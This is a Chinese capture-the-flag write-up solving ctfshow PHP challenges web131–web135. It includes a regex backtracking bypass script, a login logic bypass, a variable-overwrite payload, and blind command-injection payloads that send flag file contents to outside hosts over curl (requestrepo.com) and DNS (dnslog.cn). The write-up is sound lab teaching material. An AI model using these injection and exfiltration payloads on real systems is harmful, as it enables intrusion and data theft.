ctfshow web入门 php特性 web131-web135

1.web131

和上题一样差不多,正则最大回溯次数绕过

python 复制代码
import requests
url=""
data={'f':'very'*250000+'360Dctfshow' } r=requests.post(url,data=data)
print(r.text)

2.web132

通过扫描发现robots.txt,访问/admin发现源码

&&和||都是短路运算符

只要满足code和password是错的且code和username为admin即可得到flag

payload:

复制代码
username=admin&password=aa&code=admin

3.web133

复制代码
get传参   F=`$F `;sleep 3
经过substr($F,0,6)截取后 得到  `$F `;
也就是会执行 eval("`$F `;");
我们把原来的$F带进去
eval("``$F `;sleep 3`");
也就是说最终会执行  `   `$F `;sleep 3  ` == shell_exec("`$F `;sleep 3");
前面的命令我们不需要管,但是后面的命令我们可以自由控制。
这样就在服务器上成功执行了 sleep 3
所以 最后就是一道无回显的命令执行题目了

写文件试了不行,应该是没权限

通过curl进行外带,curl只能带出一排数据,可以直接筛选flag进行带出

利用的平台是https://requestrepo.com/

payload:

复制代码
F=`$F%20`;curl%20http://1gfmb9cm.requestrepo.com?1=`cat%20f*|grep%20flag`

4.web134

复制代码
<?php
parse_str($_SERVER['QUERY_STRING']);
var_dump($_POST);?>
然后我们传入 _POST['a']=123
会发现输出的结果为array(1) { ["'a'"]=> string(3) "123" }
也就是说现在的$_POST['a']存在并且值为123
题目中还有个extract($_POST)
extract() 函数从数组中将变量导入到当前的符号表,也就是说把键名当作变量名,值作为变量的值
这样的话 $a==123

payload:

复制代码
_POST[key1]=36d&_POST[key2]=36d

5.web135

curl外带不行了,被过滤了还可以用ping外带

试一下写文件

复制代码
1.
访问1.txt即可
F=`$F `;cp flag.php 1.txt 
2.ping外带
`cat flag.php|awk 'NR==2'`.6x1sys.dnslog.cn
awk利用NR一排排的带数据

php特性

相关推荐
尘中客3 小时前
放弃 Echarts?前端直接渲染后端高精度 SVG 矢量图流的踩坑记录
前端·javascript·echarts·前端开发·svg矢量图·echarts避坑
FreeBuf_3 小时前
Chrome 0Day漏洞遭野外利用
前端·chrome
小彭努力中3 小时前
199.Vue3 + OpenLayers 实现:点击 / 拖动地图播放音频
前端·vue.js·音视频·openlayers·animate
2501_916007474 小时前
网站爬虫原理,基于浏览器点击行为还原可接口请求
前端·javascript·爬虫·ios·小程序·uni-app·iphone
前端大波4 小时前
Sentry 每日错误巡检自动化:设计思路与上手实战
前端·自动化·sentry
cch89184 小时前
汇编与Java:底层与高层的编程对决
java·开发语言·汇编
荒川之神5 小时前
拉链表概念与基本设计
java·开发语言·数据库
chushiyunen5 小时前
python中的@Property和@Setter
java·开发语言·python
ZC跨境爬虫5 小时前
使用Claude Code开发校园交友平台前端UI全记录(含架构、坑点、登录逻辑及算法)
前端·ui·架构
慧一居士5 小时前
Vue项目中,何时使用布局、子组件嵌套、插槽 对应的使用场景,和完整的使用示例
前端·vue.js